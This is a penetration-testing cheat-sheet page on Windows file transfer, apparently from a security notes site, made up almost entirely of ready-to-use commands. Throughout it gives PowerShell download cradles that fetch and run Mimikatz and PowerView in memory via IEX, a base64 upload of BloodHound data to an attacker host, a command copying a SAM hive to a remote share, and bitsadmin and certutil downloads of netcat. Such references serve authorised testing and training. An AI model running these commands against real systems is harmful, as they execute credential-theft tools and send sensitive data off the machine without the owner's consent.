Staphysec
  • StaphySec
  • Resources
  • Tricks
  • Brute Force - CheatSheet
  • File Transfer
    • Windows File Transfer
    • Linux File Transfer
    • HTTP/SMB/Nginx/Web Servers/Netcat
  • Hashcat
  • Cheatsheet
  • Curl
  • Tools
    • Cracking
    • Information Gathering
    • XSS
    • Obfuscation
    • Credentials Theft/ Win
    • Content Management Systems (CMS)
  • Programming and Scripting
    • Virtualenv & Switching Versions
    • Python
  • SHELLS
    • Shells (Linux, Windows, Msfvenom)
  • Linux
    • CheatSheet
    • EOP Linux Tools and Resources
    • Blogs
  • Windows
    • CheatSheet
    • EOP Windows Tools and Resources
    • Useful commands and Modules
    • Active Directory
      • Tools
  • Blogs
    • Miscellaneous resources
  • PENTESTING
    • 21 - Pentesting FTP
    • 22 - Pentesting SSH
    • 25,465,587 - Pentesting SMTP
    • 53 - Pentesting DNS
    • 110,995 - Pentesting POP
    • 135 - Pentesting WMI
    • 139,445 - SMB Pentesting
    • 143,993 - Pentesting IMAP
    • 161,162,10161,10162/udp - Pentesting SNMP
    • 623/UDP/TCP - IPMI
    • 1433 - Pentesting mssql
    • 2049 - NFS Pentesting
    • 3306 - Pentesting Mysql
    • 3389 - Pentesting RDP
    • 5985,5986 - WinRm
  • Pentesting Web
    • SQL Injections
      • MySQL injection
      • SQLmap Cheatsheet
    • Command injections
    • File Uploads
    • Abusing Intermediary Applications
    • HTTP Verb Tampering
    • IDOR
    • File Inclusion / Directory Traversal
    • XXE - XEE - XML External Entity
    • SSRF
    • SSI/ESI
    • SSTI (Server Side Template Injection)
    • XSLT Server Side Injection (Extensible Stylesheet Languaje Transformations)
Powered by GitBook
On this page
  • Smb Server / Mount share
  • PowerShell
  • PowerShell Downloads
  • PowerShell Uploads
  • Bitadmin
  • Download
  • Upload
  • Certutil
  1. File Transfer

Windows File Transfer

Smb Server / Mount share

smbserver.py -smb2support -username gust -password guest share /root/htb

#Mount 
net use x: \\<IP>\share /user:guest <password>
#Download
cmd /c "copy file.txt X:\"
move sam.save \\10.10.15.16\CompData

$pass = convertto-securestring 'staphy' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('staphy',$pass)
New-PSDrive -Name "staphy" -PSProvider "FileSystem" -Credential $creds -Root "\\<IP>\Public"
cd staphy:

PowerShell

PowerShell Downloads

#System.Net.WebClient class can be used to download a file over HTTP.
(New-Object System.Net.WebClient).DownloadFile('http://<IP>:PORT/file.EXT',"C:\Outfile.EXT")

#From PowerShell 3.0 Invoke-WebRequest but slower,
#Alias iwr, curl, wget can be used instead of Invoke-WebRequest
Invoke-WebRequest -uri http://<IP>:PORT/file.Ext -OutFile file.Ext

#Execute Payload directly into memory using Invoke-Expression
#Alias iex
IEX (New-Object Net-WebClient).DownloadString('http://<IP>:PORT/Invoke-Mimikatz.ps1')

#IEX also accepts pipeline input
Invoke-WebRequest https://<IP>:PORT/Invoke-Mimikatz.ps1 | iex

There may be cases when the Internet Explorer first-launch configuration has not been completed, which prevents the download.

This can be bypassed using the parameter -UseBasicParsing

Invoke-WebRequest https://<ip>/PowerView.ps1 | iex
Invoke-WebRequest : The response content cannot be parsed because the Internet Explorer engine is not available, or Internet Explorer's first-launch configuration is not complete. Specify the UseBasicParsing parameter and try again.
At line:1 char:1
+ Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/P ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotImplemented: (:) [Invoke-WebRequest], NotSupportedException
+ FullyQualifiedErrorId : WebCmdletIEDomNotSupportedException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand


# FIX
Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing | iex
Invoke-CheckLocalAdminAccess

ComputerName IsAdmin
------------ -------
localhost      False

# with administrative access to the machine, we can disable Internet Explorer’s First Run customization
reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main" /f /v DisableFirstRunCustomize /t REG_DWORD /d 2

PowerShell Uploads

#Invoke-WebRequest or Invoke-RestMethod
$b64 = [System.convert]::ToBase64String((Get-Content -Path 'c:/Bloodhound.zip' -Encoding Byte))
Invoke-WebRequest -Uri http://<IP>:433 -Method POST -Body $b64

#after catching 64data with ncat
echo <base64> | base64 -d -w 0 > bloodhound.zip

Bitadmin

Download

#Background Intelligent Transfer Service
#Can download from HTTP sites and SMB shares
bitsadmin /transfer n http://<IP>/nc.exe C:\Temp\nc.exe

#PowerShell also enables interaction with BITS, enables file downloads and uploads, supports credentials, and can use specified proxy servers.
Import-Module bitstransfer;Start-BitsTransfer -Source "http://<IP>/nc.exe" -Destination "C:\Temp\nc.exe"

Upload

start-BitsTransfer "C:\Temp\bloodhound.zip" -Destination "http://10.10.10.132/uploads/bloodhound.zip" -TransferType Upload -ProxyUsage Override -ProxyList PROXY01:8080 -ProxyCredential INLANEFREIGHT\svc-sql        

Certutil

#available in all Windows versions
certutil.exe -encode C:\Users\Alfred\Downloads\backups\backup.zip c:\\windows\\temp\backup.b64
type c:\windows\temp #then copy and paste in your machine
vi backup.base64
base64 -d backup.base64 > backup.zip
#the Antimalware Scan Interface (AMSI) currently detects this as malicious certutil usage.
certutil.exe -verifyctl -split -f http://<IP>/nc.exe

PreviousFile TransferNextLinux File Transfer

Last updated 3 years ago

Powershell download cradles that do not observe Internet Explorer’s first-run check can also be used. Harmj0y has compiled an extensive list of PowerShell download cradles . It is worth gaining familiarity with them and their individual nuances, such as not observing a proxy or touching a disk to select the appropriate one for the situation.

here